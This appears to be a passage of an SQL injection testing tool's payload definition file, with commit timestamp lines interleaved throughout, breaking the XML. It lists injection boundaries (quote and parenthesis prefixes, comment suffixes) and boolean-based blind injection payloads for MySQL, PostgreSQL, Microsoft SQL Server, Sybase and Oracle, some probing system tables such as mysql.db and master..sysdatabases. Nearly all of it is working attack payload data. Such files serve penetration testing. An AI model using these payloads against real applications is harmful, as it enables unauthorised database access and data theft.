2010-11-28 21:10:54 +03:00
<?xml version="1.0" encoding="UTF-8"?>
<!--
Tag: <boundary >
How to prepend and append to the test ' <payload > <comment > ' string.
Sub-tag: <level >
From which level check for this test.
Valid values:
1: Always (<100 r e q u e s t s )
2: Try a bit harder (100-200 requests)
3: Good number of requests (200-500 requests)
4: Extensive test (500-1000 requests)
5: You have plenty of time (>1000 requests)
Sub-tag: <clause >
In which clause the payload can work.
NOTE: for instance, there are some payload that do not have to be
tested as soon as it has been identified whether or not the
injection is within a WHERE clause condition.
Valid values:
0: Always
2011-01-19 01:55:20 +03:00
1: WHERE / HAVING
2010-11-28 21:10:54 +03:00
2: GROUP BY
3: ORDER BY
4: LIMIT
5: OFFSET
6: TOP
7: Table name
8: Column name
A comma separated list of these values is also possible.
Sub-tag: <where >
2010-12-01 01:40:25 +03:00
Where to add our '<prefix > <payload > <comment > <suffix > ' string.
2010-11-28 21:10:54 +03:00
Valid values:
1: When the value of <test > 's <where > is 1.
2: When the value of <test > 's <where > is 2.
3: When the value of <test > 's <where > is 3.
A comma separated list of these values is also possible.
Sub-tag: <ptype >
What is the parameter value type.
Valid values:
1: Unescaped numeric
2: Single quoted string
3: LIKE single quoted string
4: Double quoted string
5: LIKE double quoted string
Sub-tag: <prefix >
A string to prepend to the payload.
Sub-tag: <suffix >
A string to append to the payload.
Tag: <test >
SQL injection test definition.
Sub-tag: <title >
Title of the test.
Sub-tag: <stype >
SQL injection family type.
Valid values:
0: Heuristic check to parse response errors
1: Boolean-based blind SQL injection
2: Error-based SQL injection
3: UNION query SQL injection
4: Stacked queries SQL injection
5: AND/OR time-based blind SQL injection
Sub-tag: <level >
From which level check for this test.
Valid values:
1: Always (<100 r e q u e s t s )
2: Try a bit harder (100-200 requests)
3: Good number of requests (200-500 requests)
4: Extensive test (500-1000 requests)
5: You have plenty of time (>1000 requests)
Sub-tag: <risk >
Likelihood of a payload to damage the data integrity.
Valid values:
0: No risk
1: Low risk
2: Medium risk
3: High risk
Sub-tag: <clause >
In which clause the payload can work.
NOTE: for instance, there are some payload that do not have to be
tested as soon as it has been identified whether or not the
injection is within a WHERE clause condition.
Valid values:
0: Always
2011-01-19 01:55:20 +03:00
1: WHERE / HAVING
2010-11-28 21:10:54 +03:00
2: GROUP BY
3: ORDER BY
4: LIMIT
5: OFFSET
6: TOP
7: Table name
8: Column name
A comma separated list of these values is also possible.
Sub-tag: <where >
Where to add our '<prefix > <payload > <comment > <suffix > ' string.
Valid values:
2011-01-12 14:57:36 +03:00
1: Append the string to the parameter original value
2: Replace the parameter original value with a negative random
integer value and append our string
3: Replace the parameter original value with our string
2010-11-28 21:10:54 +03:00
2010-12-03 17:45:13 +03:00
Sub-tag: <vector >
2010-12-01 20:09:52 +03:00
The payload that will be used to exploit the injection point.
2010-11-28 21:10:54 +03:00
Sub-tag: <request >
What to inject for this test.
Sub-tag: <payload >
The payload to test for.
Sub-tag: <comment >
Comment to append to the payload, before the suffix.
2011-01-21 00:42:55 +03:00
Sub-tag: <char >
Character to use to bruteforce number of columns in UNION
query SQL injection tests.
Sub-tag: <columns >
Range of columns to test for in UNION query SQL injection
tests.
2010-11-28 21:10:54 +03:00
Sub-tag: <response >
How to identify if the injected payload succeeded.
Sub-tag: <comparison >
Perform a request with this string as the payload and compare
the response with the <payload > response. Apply the comparison
algorithm.
NOTE: useful to test for boolean-based blind SQL injections.
Sub-tag: <grep >
Regular expression to grep for in the response body.
2011-01-07 18:41:09 +03:00
NOTE: useful to test for error-based SQL injection.
2010-11-28 21:10:54 +03:00
Sub-tag: <time >
Time in seconds to wait before the response is returned.
NOTE: useful to test for time-based blind and stacked queries
SQL injections.
2011-01-07 18:41:09 +03:00
Sub-tag: <union >
Calls unionTest() function.
NOTE: useful to test for UNION query (inband) SQL injection.
Sub-tag: <oob >
2010-12-09 02:52:31 +03:00
# TODO
2010-12-07 02:10:38 +03:00
2010-11-28 21:10:54 +03:00
Sub-tag: <details >
Which details can be infered if the payload succeed.
Sub-tags: <dbms >
What is the database management system (e.g. MySQL).
Sub-tags: <dbms_version >
What is the database management system version (e.g. 5.0.51).
2010-12-09 02:52:31 +03:00
Sub-tags: <os >
2010-11-28 21:10:54 +03:00
What is the database management system underlying operating
system.
Formats:
<boundary >
<level > </level>
<clause > </clause>
<where > </where>
<ptype > </ptype>
<prefix > </prefix>
<suffix > </suffix>
</boundary>
<test >
<title > </title>
<stype > </stype>
<level > </level>
<risk > </risk>
<clause > </clause>
<where > </where>
2010-12-03 17:45:13 +03:00
<vector > </vector>
2010-11-28 21:10:54 +03:00
<request >
<payload > </payload>
<comment > </comment>
2011-01-21 00:42:55 +03:00
<char > </char>
<columns > </columns>
2010-11-28 21:10:54 +03:00
</request>
<response >
<comparison > </comparison>
<grep > </grep>
<time > </time>
2011-01-07 18:41:09 +03:00
<union > </union>
<oob > </oob>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > </dbms>
<dbms_version > </dbms_version>
<os > </os>
</details>
</test>
-->
<root >
2010-12-03 13:52:24 +03:00
<!-- Generic boundaries -->
2010-12-07 02:15:41 +03:00
<boundary >
<level > 3</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 1</ptype>
<prefix > )</prefix>
<suffix > </suffix>
</boundary>
<boundary >
2011-01-21 00:42:55 +03:00
<level > 4</level>
2010-12-07 02:15:41 +03:00
<clause > 1</clause>
<where > 1,2</where>
2010-12-07 15:45:45 +03:00
<ptype > 2</ptype>
2011-01-21 00:42:55 +03:00
<prefix > ')</prefix>
2010-12-07 02:15:41 +03:00
<suffix > </suffix>
</boundary>
<boundary >
2011-01-21 00:42:55 +03:00
<level > 3</level>
2010-12-07 02:15:41 +03:00
<clause > 1</clause>
<where > 1,2</where>
2010-12-07 15:45:45 +03:00
<ptype > 2</ptype>
2011-01-21 00:42:55 +03:00
<prefix > '</prefix>
2010-12-07 02:15:41 +03:00
<suffix > </suffix>
</boundary>
<boundary >
<level > 5</level>
<clause > 1</clause>
<where > 1,2</where>
2010-12-07 15:45:45 +03:00
<ptype > 4</ptype>
2010-12-07 02:15:41 +03:00
<prefix > "</prefix>
<suffix > </suffix>
</boundary>
2010-12-03 13:52:24 +03:00
<!-- End of generic boundaries -->
2010-11-28 21:10:54 +03:00
2011-01-19 01:55:20 +03:00
<!-- WHERE/HAVING clause boundaries -->
2010-11-28 21:10:54 +03:00
<boundary >
<level > 1</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 1</ptype>
<prefix > )</prefix>
<suffix > AND ([RANDNUM]=[RANDNUM]</suffix>
</boundary>
<boundary >
<level > 2</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 1</ptype>
<prefix > ))</prefix>
<suffix > AND (([RANDNUM]=[RANDNUM]</suffix>
</boundary>
<boundary >
<level > 3</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 1</ptype>
<prefix > )))</prefix>
<suffix > AND ((([RANDNUM]=[RANDNUM]</suffix>
</boundary>
2011-02-04 12:30:20 +03:00
<boundary >
<level > 1</level>
<clause > 0</clause>
<where > 1,2,3</where>
<ptype > 1</ptype>
<prefix > </prefix>
<suffix > </suffix>
</boundary>
2010-11-28 21:10:54 +03:00
<boundary >
<level > 1</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 2</ptype>
<prefix > ')</prefix>
<suffix > AND ('[RANDSTR]'='[RANDSTR]</suffix>
</boundary>
<boundary >
<level > 2</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 2</ptype>
<prefix > '))</prefix>
<suffix > AND (('[RANDSTR]'='[RANDSTR]</suffix>
</boundary>
<boundary >
<level > 3</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 2</ptype>
<prefix > ')))</prefix>
<suffix > AND ((('[RANDSTR]'='[RANDSTR]</suffix>
</boundary>
<boundary >
2011-01-21 00:42:55 +03:00
<level > 1</level>
2010-11-28 21:10:54 +03:00
<clause > 1</clause>
<where > 1,2</where>
2011-01-21 00:42:55 +03:00
<ptype > 2</ptype>
2010-11-28 21:10:54 +03:00
<prefix > '</prefix>
2011-01-21 00:42:55 +03:00
<suffix > AND '[RANDSTR]'='[RANDSTR]</suffix>
2010-11-28 21:10:54 +03:00
</boundary>
<boundary >
<level > 2</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 3</ptype>
<prefix > ')</prefix>
<suffix > AND ('[RANDSTR]' LIKE '[RANDSTR]</suffix>
</boundary>
<boundary >
<level > 3</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 3</ptype>
<prefix > '))</prefix>
<suffix > AND (('[RANDSTR]' LIKE '[RANDSTR]</suffix>
</boundary>
<boundary >
2011-02-04 14:57:47 +03:00
<level > 4</level>
2010-11-28 21:10:54 +03:00
<clause > 1</clause>
<where > 1,2</where>
<ptype > 3</ptype>
<prefix > ')))</prefix>
<suffix > AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix>
</boundary>
<boundary >
<level > 2</level>
<clause > 1</clause>
<where > 1,2</where>
2011-01-21 00:42:55 +03:00
<ptype > 3</ptype>
<prefix > '</prefix>
<suffix > AND '[RANDSTR]' LIKE '[RANDSTR]</suffix>
2010-11-28 21:10:54 +03:00
</boundary>
<boundary >
2011-02-04 14:57:47 +03:00
<level > 2</level>
2010-11-28 21:10:54 +03:00
<clause > 1</clause>
<where > 1,2</where>
<ptype > 4</ptype>
<prefix > ")</prefix>
<suffix > AND ("[RANDSTR]"="[RANDSTR]</suffix>
</boundary>
<boundary >
2011-02-04 14:57:47 +03:00
<level > 3</level>
2010-11-28 21:10:54 +03:00
<clause > 1</clause>
<where > 1,2</where>
<ptype > 4</ptype>
<prefix > "))</prefix>
<suffix > AND (("[RANDSTR]"="[RANDSTR]</suffix>
</boundary>
<boundary >
<level > 4</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 4</ptype>
<prefix > ")))</prefix>
<suffix > AND ((("[RANDSTR]"="[RANDSTR]</suffix>
</boundary>
<boundary >
2011-01-21 00:42:55 +03:00
<level > 2</level>
2010-11-28 21:10:54 +03:00
<clause > 1</clause>
<where > 1,2</where>
2011-01-21 00:42:55 +03:00
<ptype > 4</ptype>
2010-11-28 21:10:54 +03:00
<prefix > "</prefix>
2011-01-21 00:42:55 +03:00
<suffix > AND "[RANDSTR]"="[RANDSTR]</suffix>
2010-11-28 21:10:54 +03:00
</boundary>
<boundary >
2011-02-04 14:57:47 +03:00
<level > 3</level>
2010-11-28 21:10:54 +03:00
<clause > 1</clause>
<where > 1,2</where>
<ptype > 5</ptype>
<prefix > ")</prefix>
<suffix > AND ("[RANDSTR]" LIKE "[RANDSTR]</suffix>
</boundary>
<boundary >
2011-02-04 14:57:47 +03:00
<level > 4</level>
2010-11-28 21:10:54 +03:00
<clause > 1</clause>
<where > 1,2</where>
<ptype > 5</ptype>
<prefix > "))</prefix>
<suffix > AND (("[RANDSTR]" LIKE "[RANDSTR]</suffix>
</boundary>
<boundary >
<level > 5</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 5</ptype>
<prefix > ")))</prefix>
<suffix > AND ((("[RANDSTR]" LIKE "[RANDSTR]</suffix>
</boundary>
2011-01-21 00:42:55 +03:00
<boundary >
<level > 3</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 5</ptype>
<prefix > "</prefix>
<suffix > AND "[RANDSTR]" LIKE "[RANDSTR]</suffix>
</boundary>
2012-05-22 01:49:54 +04:00
<boundary >
<level > 2</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 2</ptype>
<prefix > %')</prefix>
<suffix > </suffix>
</boundary>
<boundary >
<level > 3</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 2</ptype>
<prefix > %'))</prefix>
<suffix > </suffix>
</boundary>
<boundary >
<level > 4</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 2</ptype>
<prefix > %')))</prefix>
<suffix > </suffix>
</boundary>
<boundary >
<level > 1</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 2</ptype>
<prefix > %'</prefix>
<suffix > </suffix>
</boundary>
2011-01-19 01:55:20 +03:00
<!-- End of WHERE/HAVING clause boundaries -->
2010-11-28 21:10:54 +03:00
2010-12-03 13:52:24 +03:00
2011-08-24 13:04:18 +04:00
<!-- Pre - WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)" -->
<boundary >
2012-04-04 03:29:06 +04:00
<level > 5</level>
2011-08-24 13:04:18 +04:00
<clause > 1</clause>
<where > 1,2</where>
2012-04-04 03:29:06 +04:00
<ptype > 2</ptype>
<prefix > ') WHERE [RANDNUM]=[RANDNUM]</prefix>
2012-05-22 01:49:54 +04:00
<suffix > -- </suffix>
2011-08-24 13:04:18 +04:00
</boundary>
<boundary >
<level > 5</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 2</ptype>
2012-04-04 03:29:06 +04:00
<prefix > ") WHERE [RANDNUM]=[RANDNUM]</prefix>
2012-05-22 01:49:54 +04:00
<suffix > -- </suffix>
2012-04-04 03:29:06 +04:00
</boundary>
<boundary >
<level > 4</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 1</ptype>
<prefix > ) WHERE [RANDNUM]=[RANDNUM]</prefix>
2012-05-22 01:49:54 +04:00
<suffix > -- </suffix>
2011-08-24 13:04:18 +04:00
</boundary>
<boundary >
<level > 4</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 2</ptype>
<prefix > ' WHERE [RANDNUM]=[RANDNUM]</prefix>
2012-05-22 01:49:54 +04:00
<suffix > -- </suffix>
2011-08-24 13:04:18 +04:00
</boundary>
<boundary >
<level > 5</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 4</ptype>
<prefix > " WHERE [RANDNUM]=[RANDNUM]</prefix>
2012-05-22 01:49:54 +04:00
<suffix > -- </suffix>
2012-04-04 03:29:06 +04:00
</boundary>
<boundary >
<level > 4</level>
<clause > 1</clause>
<where > 1,2</where>
<ptype > 1</ptype>
<prefix > WHERE [RANDNUM]=[RANDNUM]</prefix>
2012-05-22 01:49:54 +04:00
<suffix > -- </suffix>
2011-08-24 13:04:18 +04:00
</boundary>
2011-10-28 15:00:09 +04:00
<!-- End of pre - WHERE generic boundaries -->
<!-- INSERT/UPDATE generic boundaries (e.g. "INSERT INTO table VALUES ('$_REQUEST["name"]',...)" -->
<boundary >
<level > 5</level>
<clause > 1</clause>
<where > 1</where>
<ptype > 2</ptype>
2012-04-04 03:29:06 +04:00
<prefix > ||(SELECT [RANDNUM1] FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix > )||</suffix>
2011-10-28 15:00:09 +04:00
</boundary>
<boundary >
<level > 5</level>
<clause > 1</clause>
<where > 1</where>
<ptype > 2</ptype>
2012-04-04 03:29:06 +04:00
<prefix > ||(SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix > )||</suffix>
2011-10-28 15:00:09 +04:00
</boundary>
<boundary >
<level > 5</level>
<clause > 1</clause>
<where > 1</where>
2012-03-30 20:27:08 +04:00
<ptype > 2</ptype>
2012-04-04 04:09:47 +04:00
<prefix > '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
2012-04-04 03:29:06 +04:00
<suffix > )||'</suffix>
2011-10-28 15:00:09 +04:00
</boundary>
<boundary >
<level > 5</level>
<clause > 1</clause>
<where > 1</where>
2012-03-30 20:27:08 +04:00
<ptype > 2</ptype>
2012-04-04 04:09:47 +04:00
<prefix > '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
2012-04-04 03:29:06 +04:00
<suffix > )||'</suffix>
2011-10-28 15:00:09 +04:00
</boundary>
<boundary >
<level > 5</level>
<clause > 1</clause>
<where > 1</where>
2012-03-30 20:27:08 +04:00
<ptype > 1</ptype>
2012-04-04 03:29:06 +04:00
<prefix > +(SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
2012-03-30 20:27:08 +04:00
<suffix > )</suffix>
2011-10-28 15:00:09 +04:00
</boundary>
<boundary >
<level > 5</level>
<clause > 1</clause>
<where > 1</where>
<ptype > 2</ptype>
2012-04-04 03:29:06 +04:00
<prefix > '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix > )+'</suffix>
2011-10-28 15:00:09 +04:00
</boundary>
<!-- End of INSERT/UPDATE generic boundaries -->
2011-08-24 13:04:18 +04:00
2011-11-12 18:16:43 +04:00
<!-- AGAINST boolean full - text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext - boolean.html) -->
<boundary >
<level > 4</level>
<clause > 1</clause>
<where > 1</where>
<ptype > 2</ptype>
<prefix > ' IN BOOLEAN MODE)</prefix>
<suffix > #</suffix>
</boundary>
<!-- End of AGAINST boolean full - text search boundaries -->
2011-08-24 13:04:18 +04:00
2011-01-19 01:55:20 +03:00
<!-- Boolean - based blind tests - WHERE/HAVING clause -->
2010-11-28 21:10:54 +03:00
<test >
2011-01-20 21:35:21 +03:00
<title > AND boolean-based blind - WHERE or HAVING clause</title>
2010-11-28 21:10:54 +03:00
<stype > 1</stype>
<level > 1</level>
<risk > 1</risk>
<clause > 1</clause>
<where > 1</where>
2010-12-05 14:25:44 +03:00
<vector > AND [INFERENCE]</vector>
2010-11-28 21:10:54 +03:00
<request >
<payload > AND [RANDNUM]=[RANDNUM]</payload>
</request>
<response >
<comparison > AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
2010-12-05 14:25:44 +03:00
<test >
2011-01-20 21:35:21 +03:00
<title > AND boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
2010-12-05 14:25:44 +03:00
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1</clause>
<where > 1</where>
<vector > AND [INFERENCE]</vector>
<request >
<payload > AND [RANDNUM]=[RANDNUM]</payload>
<comment > #</comment>
</request>
<response >
<comparison > AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
2011-01-24 14:12:33 +03:00
<details >
<dbms > MySQL</dbms>
</details>
2010-12-05 14:25:44 +03:00
</test>
<test >
2011-01-20 21:35:21 +03:00
<title > AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
2010-12-05 14:25:44 +03:00
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1</clause>
<where > 1</where>
<vector > AND [INFERENCE]</vector>
<request >
<payload > AND [RANDNUM]=[RANDNUM]</payload>
2011-05-24 13:16:21 +04:00
<comment > -- </comment>
2010-12-05 14:25:44 +03:00
</request>
<response >
<comparison > AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
2011-04-22 03:41:25 +04:00
<test >
2011-04-22 00:36:50 +04:00
<title > OR boolean-based blind - WHERE or HAVING clause</title>
<stype > 1</stype>
<level > 2</level>
<risk > 3</risk>
<clause > 1</clause>
<where > 2</where>
2012-03-29 18:33:27 +04:00
<vector > OR ([INFERENCE])</vector>
2011-04-22 00:36:50 +04:00
<request >
2012-03-29 18:33:27 +04:00
<payload > OR ([RANDNUM]=[RANDNUM])</payload>
2011-04-22 00:36:50 +04:00
</request>
<response >
2012-03-29 18:33:27 +04:00
<comparison > OR ([RANDNUM]=[RANDNUM1])</comparison>
2011-04-22 00:36:50 +04:00
</response>
</test>
2010-12-04 01:58:35 +03:00
<test >
2011-04-22 00:36:50 +04:00
<title > OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
<stype > 1</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1</clause>
<where > 2</where>
2012-03-29 18:33:27 +04:00
<vector > OR ([INFERENCE])</vector>
2011-04-22 00:36:50 +04:00
<request >
2012-03-29 18:33:27 +04:00
<payload > OR ([RANDNUM]=[RANDNUM])</payload>
2011-04-22 00:36:50 +04:00
<comment > #</comment>
</request>
<response >
2012-03-29 18:33:27 +04:00
<comparison > OR ([RANDNUM]=[RANDNUM1])</comparison>
2011-04-22 00:36:50 +04:00
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > OR boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
<stype > 1</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1</clause>
<where > 2</where>
2012-03-29 18:33:27 +04:00
<vector > OR ([INFERENCE])</vector>
2011-04-22 00:36:50 +04:00
<request >
2012-03-29 18:33:27 +04:00
<payload > OR ([RANDNUM]=[RANDNUM])</payload>
2011-05-24 13:16:21 +04:00
<comment > -- </comment>
2011-04-22 00:36:50 +04:00
</request>
<response >
2012-03-29 18:33:27 +04:00
<comparison > OR ([RANDNUM]=[RANDNUM1])</comparison>
2011-04-22 00:36:50 +04:00
</response>
</test>
2011-01-22 03:06:27 +03:00
<test >
2011-01-22 03:12:03 +03:00
<title > MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)</title>
2011-01-22 03:06:27 +03:00
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1</clause>
<where > 1</where>
<vector > RLIKE IF([INFERENCE],[ORIGVALUE],0x28)</vector>
<request >
<payload > RLIKE IF([RANDNUM]=[RANDNUM],[ORIGVALUE],0x28)</payload>
</request>
<response >
<comparison > RLIKE IF([RANDNUM]=[RANDNUM],[ORIGVALUE],0x28)</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2011-01-20 21:35:21 +03:00
<!-- End of boolean - based blind tests - WHERE or HAVING clause -->
2010-11-28 21:10:54 +03:00
2010-12-04 19:40:08 +03:00
<!-- Boolean - based blind tests - Parameter replace -->
2011-01-12 01:18:47 +03:00
<test >
<title > Generic boolean-based blind - Parameter replace (original value)</title>
<stype > 1</stype>
2011-05-19 03:20:02 +04:00
<level > 2</level>
2011-01-12 01:18:47 +03:00
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
2011-01-24 19:21:27 +03:00
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
2010-12-03 19:12:47 +03:00
<request >
2011-01-24 19:21:27 +03:00
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
2010-12-03 19:12:47 +03:00
</request>
<response >
2011-01-24 19:21:27 +03:00
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
2010-12-03 19:12:47 +03:00
</response>
</test>
2011-01-25 00:21:11 +03:00
<test >
<title > MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > MAKE_SET([INFERENCE],[ORIGVALUE])</vector>
<request >
<payload > MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
</request>
<response >
<comparison > MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
</response>
2011-01-25 00:21:47 +03:00
<details >
<dbms > MySQL</dbms>
</details>
2011-01-25 00:21:11 +03:00
</test>
2011-01-25 00:30:46 +03:00
<test >
<title > MySQL boolean-based blind - Parameter replace (ELT - original value)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > ELT([INFERENCE],[ORIGVALUE])</vector>
<request >
<payload > ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
</request>
<response >
<comparison > ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2011-05-19 10:32:23 +04:00
<test >
<title > MySQL boolean-based blind - Parameter replace (bool*int - original value)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > ([INFERENCE])*[ORIGVALUE]</vector>
<request >
<payload > ([RANDNUM]=[RANDNUM])*[ORIGVALUE]</payload>
</request>
<response >
<comparison > ([RANDNUM]=[RANDNUM1])*[ORIGVALUE]</comparison>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2010-11-28 21:10:54 +03:00
<test >
2011-02-07 02:17:39 +03:00
<title > MySQL > = 5.0 boolean-based blind - Parameter replace (original value)</title>
2010-11-28 21:10:54 +03:00
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
2010-12-05 15:23:18 +03:00
<clause > 1,2,3</clause>
2010-12-04 19:40:08 +03:00
<where > 3</where>
2011-11-22 19:28:31 +04:00
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-11-22 19:28:31 +04:00
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2011-11-22 19:28:31 +04:00
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0</dbms_version>
</details>
</test>
<test >
2011-02-07 02:17:39 +03:00
<title > MySQL < 5.0 boolean-based blind - Parameter replace (original value)</title>
2010-11-28 21:10:54 +03:00
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
2010-12-05 15:23:18 +03:00
<clause > 1,2,3</clause>
2010-12-04 19:40:08 +03:00
<where > 3</where>
2010-12-05 14:25:44 +03:00
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
2010-11-28 21:10:54 +03:00
<request >
2010-12-04 19:40:08 +03:00
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-04 19:40:08 +03:00
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2011-05-19 03:40:42 +04:00
<test >
<title > PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)</title>
<stype > 1</stype>
<level > 3</level>
2011-05-19 10:32:23 +04:00
<risk > 2</risk>
2011-05-19 03:40:42 +04:00
<clause > 1,2,3</clause>
<where > 3</where>
<vector > (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
<request >
<payload > (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
</request>
<response >
<comparison > (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
2010-11-28 21:10:54 +03:00
<test >
2011-02-07 02:17:39 +03:00
<title > Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title>
2010-11-28 21:10:54 +03:00
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
2010-12-05 15:23:18 +03:00
<clause > 1,3</clause>
2010-12-04 19:40:08 +03:00
<where > 3</where>
2010-12-05 14:25:44 +03:00
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
2010-11-28 21:10:54 +03:00
<request >
2010-12-04 19:40:08 +03:00
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-04 19:40:08 +03:00
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
2011-02-14 00:20:21 +03:00
<dbms > Sybase</dbms>
2011-01-21 00:42:55 +03:00
<os > Windows</os>
2010-11-28 21:10:54 +03:00
</details>
</test>
<test >
2011-02-07 02:17:39 +03:00
<title > Oracle boolean-based blind - Parameter replace (original value)</title>
2010-11-28 21:10:54 +03:00
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
2010-12-05 15:23:18 +03:00
<clause > 1,3</clause>
2010-12-04 19:40:08 +03:00
<where > 3</where>
2011-01-24 19:21:27 +03:00
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-01-24 19:21:27 +03:00
